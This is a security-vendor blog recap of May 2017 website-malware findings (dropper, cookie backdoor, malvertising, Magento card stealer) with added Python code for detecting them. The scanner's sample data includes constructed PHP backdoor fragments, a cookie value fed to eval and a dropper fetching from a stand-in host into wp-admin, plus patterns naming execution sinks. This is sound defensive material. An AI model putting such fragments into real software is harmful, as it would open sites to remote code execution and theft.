Labs Notes Monthly Recap – May/2017

June 6, 2017, by Estevao Avillez

Sucuri Labs provides website malware research updates directly from our teams on the front line. You can read past monthly recaps to catch up on the trends we look at every month.

This month, our Malware Research and Incident Response teams wrote about malware infections ranging from backdoors and credit card stealers to malvertising.

The Elegant Dropper – Reusable Code for PHP Shell Installation

Yuliyan Tsvetskov

In website security, a “dropper” is a piece of code that downloads malicious content from an external source. The actual code injection on the victim’s site appears legitimate and is often undetected by security scanners.

This piece of code adds further evasion: it first sets up variables holding the path where the backdoor will be written, then downloads the backdoor code from an external malicious URL. Combining the two, the dropper writes the malicious file contents into the WordPress admin area. Even if the backdoor is removed, the dropper can be executed again to reinject it.

Simple $_COOKIE Backdoor Variation

Fernando Barbosa

Malware often uses $_POST and $_GET requests to inject (or steal) content for malicious purposes; such requests are usually flagged as malicious sooner or later.

In this case, we look at an attacker who sets cookie values containing malicious content in the form of “eval” statements and executable code. We found several variants throughout the infected file system. The cookie values are then used as variables in the injected malware and executed remotely.
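The two items above (the dropper that fetches a remote payload and writes it into wp-admin, and the backdoor that feeds $_COOKIE into eval) share a detection idea: a file that combines an untrusted source with a dangerous sink is worth triage even when each half looks harmless alone. The scanner below is an added example written for this recap, not Sucuri's own tooling; the regexes are assumed heuristics, and the PHP fragments it scans are constructed stand-ins, not samples from the posts.

```python
import re
from typing import Dict, List

# Untrusted input that a backdoor reads from the request (the cookie variant).
COOKIE_SOURCE = re.compile(r"\$_COOKIE\b")
# Sinks that execute a string or spawn a process.
EXEC_SINKS = re.compile(r"\b(eval|assert|create_function|system|passthru|shell_exec|exec)\s*\(")
# A fetch from a remote URL (the dropper's download step).
REMOTE_FETCH = re.compile(r"\b(file_get_contents|fopen)\s*\(\s*[\"']https?://|\bcurl_init\s*\(")
# A write to the local filesystem (the dropper's injection step).
FILE_WRITE = re.compile(r"\b(file_put_contents|fwrite|fputs)\s*\(")
# Writing under wp-admin is far more suspicious than writing to a cache dir.
ADMIN_PATH = re.compile(r"wp-admin", re.IGNORECASE)

# Constructed sample files (hypothetical paths, not from the posts).
SAMPLE_FILES: Dict[str, str] = {
    # Cookie-fed eval: untrusted source and execution sink in one file.
    "wp-content/uploads/cache.php": '<?php $c = $_COOKIE["k"]; eval($c);',
    # Remote fetch written into wp-admin: the dropper pattern.
    "wp-includes/load.php": '<?php $p = ABSPATH . "wp-admin/x.php"; '
                            'file_put_contents($p, file_get_contents("http://example.invalid/p"));',
    # Legitimate-looking feed cache: same fetch+write shape, benign destination.
    "wp-content/plugins/feedcache/cache.php": '<?php file_put_contents(WP_CONTENT_DIR . "/cache/feed.xml", '
                                              'file_get_contents("https://example.invalid/feed"));',
    # Uses setcookie(), not $_COOKIE, and has no sink: should not be flagged.
    "wp-content/themes/t/functions.php": '<?php add_action("init", function () { setcookie("seen", "1"); });',
}


def _line_of(source: str, match: "re.Match[str]") -> int:
    """1-based line number where a regex match starts."""
    return source[: match.start()].count("\n") + 1


def scan_source(path: str, source: str) -> List[Dict[str, str]]:
    """Return one finding per source->sink combination present in a PHP file."""
    findings: List[Dict[str, str]] = []

    src = COOKIE_SOURCE.search(source)
    sink = EXEC_SINKS.search(source)
    if src and sink:
        findings.append({
            "path": path,
            "rule": "cookie_to_exec",
            "severity": "high",
            "line": str(_line_of(source, sink)),
            "evidence": sink.group(0).strip(),
        })

    fetch = REMOTE_FETCH.search(source)
    write = FILE_WRITE.search(source)
    if fetch and write:
        # Destination matters: wp-admin is a backdoor location, a cache dir may be a plugin.
        severity = "high" if ADMIN_PATH.search(source) else "medium"
        findings.append({
            "path": path,
            "rule": "remote_fetch_to_write",
            "severity": severity,
            "line": str(_line_of(source, write)),
            "evidence": write.group(0).strip(),
        })
    return findings


def scan_files(files: Dict[str, str]) -> List[Dict[str, str]]:
    """Scan a path->source mapping in a stable (sorted) order."""
    out: List[Dict[str, str]] = []
    for path in sorted(files):
        out.extend(scan_source(path, files[path]))
    return out


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['severity']:<6} {f['rule']:<22} {f['path']}:{f['line']} ({f['evidence']})")
```

The plugin cache file is reported at medium severity on purpose: fetch-then-write is exactly what a feed cacher or updater does, so the rule is a triage signal, and the write destination (wp-admin versus a cache directory) is what separates the two. Obfuscated droppers that build function names from string fragments will slip past plain regexes; the point is to catch the low-effort variants and direct analyst time at the rest.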

Tricky Malvertising Injections

Abdelli Nasereddine

Conditional malware targets only specific visitors (by geo-location, device, or referrer such as Google Search), which makes it harder to detect. This type of targeting is often seen with SEO spam and malvertising.

This malicious code serves different ads to visitors depending on their time zone. Lately, these types of injections have been noticeably rising in popularity.

Client-Side or Server-Side Script?

Denis Sinegubko

Injected JavaScript is always suspicious: what appears to be a benign resource can actually be malicious. We found this particular infection on a Magento website, with a twist on the classic credit card stealer.

A server-side script receives the data from filled-in checkout forms by collecting the POST request parameters. If the request does not use the POST method or does not pass the correct parameters, the script pretends to be a benign JavaScript file.
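A script that serves JavaScript on GET but collects card data on POST leaves a footprint in the web server access log: a static .js path should never receive a POST. The log check below is an added example for this recap, not code from the post; it assumes the Combined Log Format, and the log lines it parses are constructed, not taken from the infected site.

```python
import re
from typing import Dict, List, Optional

# Combined Log Format (assumed): ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Extensions that denote static assets; a POST to one of these is a form being
# submitted to a file that should not be able to read it.
STATIC_EXT = (".js", ".css", ".png", ".jpg", ".gif", ".svg", ".woff")

# Constructed sample log (hypothetical IPs, paths and timestamps).
SAMPLE_LOG = """\
203.0.113.10 - - [06/Jun/2017:10:01:02 +0000] "GET /js/lib/jquery.js HTTP/1.1" 200 8713 "https://shop.example/checkout/onepage/" "Mozilla/5.0"
203.0.113.10 - - [06/Jun/2017:10:01:09 +0000] "POST /js/lib/prototype.js?v=1 HTTP/1.1" 200 412 "https://shop.example/checkout/onepage/" "Mozilla/5.0"
203.0.113.10 - - [06/Jun/2017:10:01:11 +0000] "POST /checkout/onepage/saveOrder/ HTTP/1.1" 200 96 "https://shop.example/checkout/onepage/" "Mozilla/5.0"
198.51.100.7 - - [06/Jun/2017:10:02:30 +0000] "GET /skin/frontend/base/default/js/track.js HTTP/1.1" 200 1034 "https://shop.example/" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_static_path(path: str) -> bool:
    """True when the request path (query string ignored) names a static asset."""
    bare = path.split("?", 1)[0].lower()
    return bare.endswith(STATIC_EXT)


def flag_posts_to_static(log_text: str) -> List[Dict[str, str]]:
    """Return every POST aimed at a static asset path, with context for triage."""
    hits: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        if rec["method"] == "POST" and is_static_path(rec["path"]):
            hits.append({
                "ip": rec["ip"],
                "path": rec["path"].split("?", 1)[0],
                "status": rec["status"],
                "referer": rec["referer"],
                # A 200 means the server-side handler accepted the body rather than
                # rejecting it the way a real static file would be served.
                "accepted": "yes" if rec["status"] == "200" else "no",
            })
    return hits


if __name__ == "__main__":
    for h in flag_posts_to_static(SAMPLE_LOG):
        print(f"POST to static path {h['path']} from {h['ip']} (status {h['status']}, referer {h['referer']})")
```

The referer is kept in the finding because a POST to a .js file coming from the checkout page is the exact shape this stealer produces; the same check on other pages mostly turns up broken forms or scanners. On the server side, confirm by fetching the flagged path with GET and inspecting whether it is a real static file or a PHP handler that only masquerades as one.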

Categories: Security Education, Sucuri Updates. Tags: Industry Reports, Labs Notes Recap, Malware Updates.

About Estevao Avillez

Estevao Avillez is currently Director of Product Management at GoDaddy and Director of Security Operations. He oversees Sucuri's Malware Research Lab and leads the Incident Response Team in providing the highest standard of customer service. You can follow him on Twitter at @estevaoavillez.
